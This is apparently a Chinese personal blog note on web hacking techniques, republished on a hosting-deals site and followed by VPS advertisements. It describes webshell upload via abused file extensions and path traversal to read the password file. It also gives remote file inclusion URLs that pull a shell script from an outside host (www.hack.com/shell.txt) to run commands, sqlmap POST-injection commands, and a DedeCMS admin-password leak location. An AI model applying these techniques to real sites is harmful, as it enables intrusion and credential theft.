2016.5.19***经验总结

PHP下防跨站用PHP自带的strip_tags()和htmlspecialchars（）可以对用户提交的
html和PHP进行转换，对UPDATE和INSERT中的变量用以上两个函数转换

如果PHP假设在win上那么就可以解析cer，asa，aspx，asax，aspx，cdx格式的文件
而在Linux，Unix上则可以解析pl，PHP3，格式的文件（pl：perl语言）

PHP2，PHP，Inc，pwml，asa，cer利用上传webshell
如果PHP使用了文件包含的方法则用 www.xxx.com/index.php?page=./admin.php就可以读取当前路径下admin.php文件的内容了，也可以用../跳转到其他目录去查看其
它文件 Linux下如果路径对则可以读出密码文件若不对可以用../不断探测Linux主机下 www.xxx.com/index.php?page=http://www.hack.com/shell.txt?shell=ls
-a 可以遍历当前目录下的所有文件，win下提交www.xxx.com/index.php?
page=http://www.hack.com/shell.txt?shell=dir 同样遍历文件

sqlmap的post注入新学到的方法：在网站中找到表单提交的地方，填写信息提交，抓
包，抓到的包存在txt文件中，运行sqlmap，sqlmap.py -r 文件路径sqlmap，sqlmap.py -r 文件路径 --current-db 读取当前数据库

织梦cms 配置文件地址 data/admin/ 下，其中的ver.txt 存放的是系统的版本时间
，系统文件时间，找到相应版本的日志文件地址。里面可以爆出管理员密码，找到后台
即可登录。

--------------------------------------------------------------
主机参考，收集国内外VPS，VPS测评，主机测评，云服务器，虚拟主机，独立服务器，国内外服务器，高性价比建站主机相关优惠信息@zhujicankao.com
详细介绍和测评国外VPS主机,云服务器,国外服务器,国外主机的相关优惠信息,商家背景,网络带宽等等,也是目前国内最好的主机云服务器VPS参考测评资讯优惠信息分享平台

这几篇文章你可能也喜欢：

• PacificRack，黑色星期五特别优惠，美国便宜VPS云服务器低至1折，美国洛杉矶QN自营机房，KVM虚拟架构，2核4G内存100Mbps带宽，仅15美元/年，约1.25美元/月
• ZJI，双十二特价优惠活动，香港免备案独立服务器5.5折，阿里云CN2专线，双线双IP，E5-2630L（6核12线程）处理器16G内存5Mbps CN2+BGP带宽，412.5元/月
• #实时更新#最新2021年主机商双十一活动汇总，国内外VPS主机商双11促销优惠活动汇总，海外免备案VPS云服务器/独立服务器超大带宽不限流量双11活动
• ZJI，双十一特价优惠，自营免备案香港独立服务器/独服一律55折，香港阿里云专线/BGP，Intel E5-2630L处理器16G内存5Mbps带宽CN2+BGP阿里云专线，412元/月
• ZJI，香港葵湾独立服务器/物理服务器特价优惠，终身55折循环优惠，CN2+BGP线路，E5-2630L处理器16G内存15Mbps带宽，522.5元/月

本文由主机参考刊发，转载请注明：2016.5.19***经验总结 https://zhujicankao.com/12460.html